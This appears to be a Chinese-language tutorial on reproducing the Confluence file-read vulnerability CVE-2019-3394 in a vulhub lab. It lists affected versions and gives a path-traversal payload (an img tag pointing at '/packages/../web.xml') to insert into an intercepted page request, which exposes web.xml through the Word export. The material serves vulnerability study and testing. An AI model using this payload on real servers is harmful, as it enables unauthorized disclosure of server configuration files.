您好,登錄后才能下訂單哦!
Confluence 文件讀取漏洞CVE-2019-3394該如何復現,針對這個問題,這篇文章詳細介紹了相對應的分析和解答,希望可以幫助更多想解決這個問題的小伙伴找到更簡單易行的方法。
0x01 影響范圍
6.1.0 <= version < 6.6.16
6.7.0 <= version < 6.13.7
6.14.0 <= version < 6.15.8
0x02 環境搭建
溫馨提示:環境搭建要使用4G或以上運存的虛擬機/VPS搭建
這里使用之前CVE-2019-3396的漏洞環境,按照鏈接中的步驟搭建即可
https://github.com/vulhub/vulhub/tree/master/confluence/CVE-2019-3396
環境啟動過程中出現了點小問題
經百度查找后得到解決方案:
# 進入backports模塊路徑
cd /usr/local/lib/python2.7/dist-packages
# 復制整個包到transport包路徑下
cp -r backports /usr/local/lib/python2.7/dist-packages/docker/transport
0x03 漏洞利用
創建頁面填好信息后,確認創建處抓包
修改編輯文本的內容如下:
<p><img class=\"confluence-embedded-image\" src=\"/packages/../web.xml\" /></p>
導出為word處抓包
在返回包中即可看到web.xml文件內容
條件限制:此漏洞無法跳出web目錄去讀其他目錄的文件
關于Confluence 文件讀取漏洞CVE-2019-3394該如何復現問題的解答就分享到這里了,希望以上內容可以對大家有一定的幫助,如果你還有很多疑惑沒有解開,可以關注億速云行業資訊頻道了解更多相關知識。
免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。